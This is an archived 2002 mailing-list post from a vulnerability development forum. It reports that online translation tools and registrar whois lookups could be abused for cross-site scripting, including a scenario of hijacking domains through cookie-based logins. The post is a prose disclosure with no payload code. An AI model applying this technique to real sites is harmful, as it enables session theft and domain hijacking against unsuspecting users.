Vulnerability Development mailing list archives

Re: CSS, CSS & let me give you some more CSS

From: "M. Burnett" <mb () xato net>
Date: Thu, 31 Jan 2002 10:06:05 -0700

In the process of translating this French tutorial into English using
babelfish.altavista.com, I noticed that it converted the encoded
characters in the document.  Which brings up another potential source
of cross-site scripting attacks via translation and other online
tools.  Using a variety of techniques, one could formulate a URL that
appears to be coming from altavista.com but in fact is loading a page
loaded with nefarious code from any site.  Similar vulnerabilities
could potentially be found in sites such as HTML validation utilities
or broken link checkers.

I also found several domain name registrars that had whois lookups
that were vulnerable to cross-site scripting.  These in particular
could be serious vulnerabilities as some of these registrars allow
login via cookies.  By sending a properly crafted URL to the right
person, one could potentially hijack another's domain.

Mark Burnett
www.xato.net